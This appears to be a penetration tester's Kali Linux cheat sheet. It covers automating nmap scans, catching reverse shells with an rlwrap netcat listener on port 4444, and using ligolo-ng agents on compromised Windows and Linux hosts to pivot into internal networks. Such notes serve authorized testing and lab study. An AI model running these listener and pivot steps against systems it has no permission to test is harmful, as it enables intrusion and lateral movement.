# Automate nmap scans
# Git clone and create a symbolic link so you can run it everywhere
git clone https://github.com/21y4d/nmapAutomator.git
sudo ln -s /home/kali/tools/nmapAutomator/nmapAutomator.sh /usr/local/bin/nmapautomator
cd /usr/local/bin
ls -al
# My most-used commands
nmapautomator -H $IP -t full
nmapautomator -H $IP -t udp
# Able to use arrow keys in reverse shell
sudo apt install rlwrap -y
rlwrap nc -nvlp 4444
# No more SOCKS and ProxyChains
# Check if your kali comes with ligolo-ng pre-installed
apt list --installed | grep ligolo
# Install ligolo-ng
sudo apt install ligolo-ng
# Setup
# Kali
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.X.0/24 dev ligolo # Internal network
ligolo-proxy -selfcert
# Windows agent
./ligoloAgent.exe -connect 192.168.45.X:11601 --ignore-cert # Kali IP
# Linux agent
./ligololinuxagent --connect 192.168.45.X:11601 --ignore-cert & # Kali IP
# Kali:
session
start
# Kali
# Redirect traffic to the agent's local IP address (127.0.0.1)
# Useful when target's open ports are only accessible locally
sudo ip route add 240.0.0.1/32 dev ligolo